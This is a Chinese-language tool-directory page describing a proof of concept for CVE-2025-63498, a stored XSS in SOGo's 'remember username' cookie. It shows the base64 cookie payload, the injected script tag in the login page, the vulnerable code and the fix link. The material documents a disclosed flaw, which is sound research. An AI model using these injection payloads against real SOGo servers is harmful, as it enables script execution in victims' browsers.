Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-63498 — SOGo群件存储型XSS概念验证,通过登录端点利用'记住用户名'cookie注入JavaScript载荷。 | Kitploit
工具/GitHubGitHub/xryptoh/cve-2025-63498
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubxryptoh/cve-2025-63498

CVE-2025-63498

SOGo群件存储型XSS概念验证,通过登录端点利用'记住用户名'cookie注入JavaScript载荷。

查看仓库
218个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Alinto/SOGo cookie中的存储型XSS

研究者: Daniil Khomichenok, Alexander Klimenko

受影响版本 < 5.12.4 ( https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.4 )

日期: 01.10.2025


当启用 "记住用户名" 功能时,浏览器 cookie 中会添加一个 base64 编码的字段。

该值取自对 /SOGo/connect 端点的 POST 请求中的 "userName" 参数。

服务器响应包含 base64 编码的 XSS payload 并设置 cookie:

Set-Cookie: SOGoLogin=dGVzdDIyMkBxYXRlc3Qub2YuYnk8L3NjcmlwdD48c2NyaXB0PmFsZXJ0KCcxMjMnKTwvc2NyaXB0Pg%3D%3D; expires=Sun, 02-Nov-2025 09:58:23 GMT;

向 POST 请求的 "userName" 参数添加以下值:

[email protected]

其中包含一个 JavaScript 注入,当用户重新访问认证页面时会被执行,并存储在用户浏览器的 "SOGoLogin" cookie 中。

包含注入的认证页面代码:

root@kitploit:~
<script type="text/javascript">
var cookieUsername = "[email protected]</script><script>alert('123')</script>";
var language = 'English';
var loginHint = ''
</script>

接受 XSS 注入作为参数值的登录 remember set-cookie 代码:

root@kitploit:~
if (rememberLogin)
  [response addCookie: [self _cookieWithUsername: [params objectForKey: @"userName"]]];
  else
  [response addCookie: [self _cookieWithUsername: nil]];

修复: https://github.com/Alinto/sogo/commit/9e20190fad1a437f7e1307f0adcfe19a8d45184c

下载工具